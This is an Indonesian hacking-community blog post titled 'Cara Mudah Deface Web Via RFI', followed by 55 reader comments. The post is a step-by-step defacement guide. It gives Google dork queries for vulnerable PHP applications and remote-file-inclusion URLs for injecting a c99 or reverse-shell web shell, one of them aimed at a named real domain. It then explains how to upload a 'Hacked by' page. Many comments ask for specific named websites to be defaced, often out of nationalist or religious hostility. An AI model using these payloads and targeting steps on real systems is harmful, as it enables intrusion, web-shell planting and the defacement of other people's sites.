Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Cara Mudah Deface Web Via RFI

15 September 2008
Penulis:   · Kategori Artikel: Hacking, Vuln

BINUS HACKER Binus Hacker Is Not Criminal Banner





Cara Mudah Deface Remote File Include

Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..

cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url

[EvilShellInject] = inject rshell / c99 kamu

Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com

- Site Oneadmin RFI

Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]

- PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…

nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

- Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]

Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..

Nah setelah itu buadlah sebuad file: index.html

Isi dengan:
<html>
Hacked by Nama Kamu
</html>

Kemudian upload deh file ke directorynya

kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html

Enjoy

BINUS HACKER Binus Hacker Chat and Forum

Komentar

55 Komentar Untuk “Cara Mudah Deface Web Via RFI
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. fadlie pada 23 October 2008 7:42 pm

    good article

  2. bagus pada 4 November 2008 10:50 pm

    Mas tolong dong deface web berikut ini:

    http://kamiantiindon.blogspot.com
    http://dontvisitindon2008.blogspot.com

    Terima kasih…

  3. tanah airku pada 31 December 2008 2:24 am

    koq ga di kasih tanggapan untuk koment
    blog anti indonesia.

    kasih bukti nya pleeassee…

  4. carita pada 4 March 2009 11:43 am

    iya… jangan diem aja kalooo harga diri bangsa sendiri di injak-injak buktikan kalau IT indonesia bisa melawan malaysia.
    gw tunggu hasil akhirnya.
    andai gw bisa… dah gw acak-acak tuh blog..
    sayang gw gak bisa

    nasib ya nasib….

    maaf bangsaku.. aku hanya bisa perang melawan melalui comment-commentnya, tanpa bisa menghentikannya, dan akan banyak orang-orang yang melihat http://www.kamiantiindon.blogspot.com.

  5. pingin jadi hacker pada 9 April 2009 7:55 am

    bingung bgt sama ini..butuh guru yg bisa guide dari YM nih..mail gw ya yg brsedia Hey_Goo_619@hotmail.com

    thanks

  6. I LOVE INDONESIA pada 12 April 2009 2:27 am

    Ampe Sekarang http://kamiantiindon.blogspot.com
    http://dontvisitindon2008.blogspot.com masih ada tuh??? bisa deface gak loe????

    Buktiiiiiiin!!!!!!!

  7. Oke pada 12 May 2009 8:38 pm

    PAsti Ga Bisa Def http://dontvisitindon2008 because u cuma ngarang or teori raba2 hehehe…, Masa X mesti bil. U Go..lx
    Malu donk klu kita cm bs Teori burung kutilang

  8. shandy pada 16 May 2009 8:21 pm

    situs http://www.mega-bisnis.com anti deface, keren banget.

  9. speak-trum analizer pada 25 May 2009 10:56 am

    ya dah .. yg jago2
    deface ajah yg turun tangan.. cepet.. daripada ngurusin yg atu ni..
    tuh blog ‘fitna’ bangget !?????
    ^-^

  10. Bns @hacker pada 4 June 2009 10:13 pm

    Tenang bro, ntar gw hack

  11. RvO pada 8 July 2009 5:44 am

    Duch.. Kejahatan Jgn DbLz dengan Kejahatn Om…
    Biarin Aj mereka Berbicara Itu..

    Om Bns Hacker???
    KyaNa Om Tw Y Bugs Di Blogspot…
    Share Donk????

    KLw Krim Ke My Mail: redevil_community@yahoo.com
    ditunggu Y…

    Slam HAcker Sejati…

  12. isarock pada 20 August 2009 5:08 am

    makasih atas infonya omm…link back ya…hehehehe

  13. Jamz_edo pada 5 September 2009 9:39 am

    wah wah wah….! aku gag mudeng sama sekali deface apaan sih…! trus bedanya ama hacker apaan ya…please ajarin gua donk…. tp jangan suruh googling ya….

  14. dasenk pada 7 September 2009 1:57 pm

    ada lagi neh bos blog pnya MALINGSIAL

    http://sayabenciindon.blogspot.com/

    ganyang z deh :D

  15. kopral_Singkong pada 17 September 2009 8:01 am

    wah boleh d sedot nieh ilmunya….

    gan kLo deface blog gmana ???

  16. Arcoper pada 12 October 2009 5:44 am

    Klo ada artikel yang lebih jelas kirim ya… Arcoper@yahoo.co.id

  17. Hendh pada 3 November 2009 2:24 am

    Bro thanks atas infonya.. Tapi kalo bisa kirimin aku videonya kalo bisa lagi video deface web nya.. Plis bro.. Tolong yah plis.. Plis 1000x plis hendhrose@live.com makasih banyak bro..

  18. yogi pada 9 November 2009 8:03 am

    mas bantu donk untuk deface web ini :

    http://sman114jkt.com/

  19. buduk pada 8 December 2009 7:12 pm

    mau hack blogspot???hebat…..??hack dlu sono google,klo bisa brarti lu bisa hack blogspot…

  20. aznas pada 8 January 2010 10:08 pm

    itu bukan deface boz, itu cuman inject aja, kalo menurut saya deface itu target adalah halaman utamanya, misal http://targat.com, dah langsung tampil hasil defecan kita

  21. ifan pada 11 January 2010 4:09 am

    gan minta tolong dengan segala hormat tolong deface web brikut. http://murtadinkafirun.forumotion.net/ karena forum ini sangat meresahkan….
    ini dapat menghilangkan rasa saling menghormti antar agama…

    thanzk gan.

  22. Zen0nk` pada 20 April 2010 6:56 pm

    kk semua deface blogspot tuch sulit, paling pake soceng kaya mau hack account FB…. blogspot = buatan google…

  23. asroni pada 26 April 2010 5:14 am

    tolong banget mas deface blog ini

    unitedstatestrends.co.cc

    soalnya sering copas artikel punya saya….sampai” punya sya sudah tidak erindex lagi…huh……mohon bgt mas..thanks…..

  24. eliazt pada 29 April 2010 7:30 am

    kalau di scan bs gk ia web itu?

  25. Pujolz pada 11 June 2010 5:43 am

    Jangan minta dikasih makan truz bro.. Experience is the best teacher.. Apa hubungannya???…

  26. IdeGue! Blog pada 20 June 2010 10:14 am

    keren!…
    salam kenal

  27. bD pada 4 July 2010 10:32 pm

    pada nyobain diri dulu dong semuanya.,.,jangan cuman minta “disuapin” aja…kan ntar malah yg pinter cuman orang yg mau nglakuin aja.,.yang g mau belajar?!?!mana bisa,.,

  28. krisna pada 30 July 2010 3:51 am

    saya orang yang lagi awal2nya blajar kom. . ap lagi jringan. . apa deface bukan ngerusak webnya orang lain???? apa tu bkan ngehacker???

  29. 849035_tm pada 6 September 2010 2:42 am

    wah boleh jg nih..
    mayan susah..
    izin dipelajari..

  30. Wer pada 7 September 2010 10:47 am

    Salam Kenal..,,,

    Orang Awam bertanya.. :D
    bgmana cara mengembalikan hak akses kembali normal (mode 755 Folder , 644 File) pada File Manajer di cPanel..,, sdh coba di utak-atik tapi belum berhasil….

    Mohon Pencerahannya…,, Tq.

  31. a pada 11 September 2010 10:07 pm

    kk tanya dong…maksud yang tanda kurung itu [ ] misal : [docroot] , [search_disp] itu apa ya…apa tiap web yg mau di inject harus dikasih tanda [ ] gitu??

    newbie nih gan maaf..

  32. ADE pada 21 September 2010 11:21 pm

    kk saya ga ngerti, ajari bole??????????????
    pake saja contoh blog saya,
    http://berniawan.wordpress.com/multimedia/

  33. ryan pada 29 September 2010 3:06 am

    good artikel

  34. ghost_of_iraq pada 28 October 2010 12:28 am

    pade tolol lo pada..
    Kalian berkicau2 koar2 suruh hack blogspot.
    Kalian tau blogspot itu milik siapa? Milik google cuk !
    Mau deface blogspot = hadapin google dolo.
    Mau perang sama google = belajar dulu sama XIAO TIAN

  35. Simple seo pada 19 November 2010 9:14 pm

    Bingung bos,

  36. Rockstar Game pada 30 December 2010 7:47 pm

    @ghost_of_iraq=

    haha, yap baru pngen guw jawab bgtu dah dijwab duluan.

    security nya blogspot kuat bradh.

    seandainya bisa di hack hnya hacker2 brpengalaman yg ilmu nya udah ngelotok.

  37. tabun pada 7 January 2011 6:35 pm

    hhmm……
    w liatin komen2nya, kayax liatin nasi basi aja….
    kalau nggax tau manding gax usah ngomen….

    @Tq gan tutor nya…..^_^

  38. HAcker pada 17 February 2011 3:32 pm

    Jangan bicara soal Idealisme
    mari bicara soal berapa banyak uang di kantong kita
    Jangan Bicara soal harga diri bangsa
    Mari bicara soal berapa besar ancaman yang membuat kita terpaksa onani
    Lihat disana si icih sedih di ranjang empuk saat majikannya menindih

  39. Nanang pada 4 April 2011 2:13 am

    wah kalian pada tidak bisa hack website (deface) yang jelas Blogspot.com tidak bisa di Hack .. kalo bisa hack blogspot berarti Hack Google.com juga… mau cari masalah sama google.. udah cari orangnya aja .. hajar..
    kalo ngga hack tu email loginnya blogspot acak2 dah via email +password

    kalo website bisa lah di deface di hack ….

  40. BOGEN pada 18 June 2011 12:58 pm

    Klo mau perang ma malingsial.
    bukan dg cara deface.
    gax ngaruh apa2.
    bisa gax? PC2PC.
    Tu baru PERANG.
    GOBLOG.

  41. I LOVE INDONESIA 2 pada 30 June 2011 3:23 am

    SI MALINGSIAL NGEJELEKIN INDONESIA , BANCI BANGET SIH……! BERANINYA PAKE BLOGSPOT KALO BERANI GW TANTANG BLOGNYA PAKE PHP……! SI MALINGSIAL TAKUT DI HACK MAKANNYA PAKE BLOGSPOT…….! KALO PAKE PHP, UDAH GW HABISIN TUH BLOG………..!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

  42. boersan pada 4 July 2011 7:42 am

    mantap gan baru cari referensi beserta berguru kepada anda karena saya ingin belajar..

  43. cheatos pada 23 July 2011 12:14 pm

    hahahah namanya juga malaysia berani dikandang doang :D

  44. Toko Webmaster pada 23 July 2011 7:40 pm

    Ane juga biasa ngehack, tapi ngehack wanita..wkwkwk

  45. Andrio pada 20 August 2011 2:15 am

    http://www.wilw0rm.com nya kok gak mau gan ?

  46. telo gosong pada 30 October 2011 6:22 pm

    kt siapa blogspot g bs d hack.hmhmhm

  47. hacked by br34k_c0d3_666 pada 7 June 2012 11:09 pm

    hacked by br34k_c0d3_666

    mohon untuk di patch .
    trims.

  48. kevin pada 4 July 2012 9:05 am

    minta di nuklir tuh malingsia

  49. KieMelonade pada 27 August 2012 3:34 am

    SUMPAH GUAA GA NGERTI !

  50. Belajar pada 11 November 2012 7:03 am

    komentarnya cuy, kenapa merembet ke malaysia. mbok yaa dikit-dikit kita menghargai si penulis artikel ini. kalau mau diskusi tentang ,malaysia disini tempatnya http://antimalaysia.forumid.net/forum , bukanya saya nggak cinta sama indonesia. tapi kita berjalan sesuai jalanya donk, seperti belajar kata bang mimin. oke mas bro, trima kasih atas postinganya menambah pengetahuan saya bahwa ” blogspot ” tidak bisa di deface..

    @buat semuanya, salam kenal yah..

  51. F4RhaN pada 14 December 2012 8:03 pm

    bang izin copas

  52. depok cyber pada 14 January 2013 3:16 am

    .jare sopo blogspot nda bisa dideface?? jajalke iki sek cah
    http://malang-cyber.blogspot.com/

  53. akhyar pada 15 January 2013 8:26 am

    aku juga iso deface blogspot

    ini buktinya
    http://xp1nank.blogspot.com

  54. Deka pada 4 February 2013 10:49 pm

    Gue Juga bIsa Ni buktinya Blog Mantan saya ,

    http://buatyangulangtahun.blogspot.com/

  55. ssjero30 pada 8 February 2013 4:26 pm

    @akhyar
    @Deka=====>>>>> coba kalo bisa… paling-paling itu blog buatan sendiri… di desain kya gitu…bilangnya deface…. :P

Silahkan Berikan Tanggapan Anda...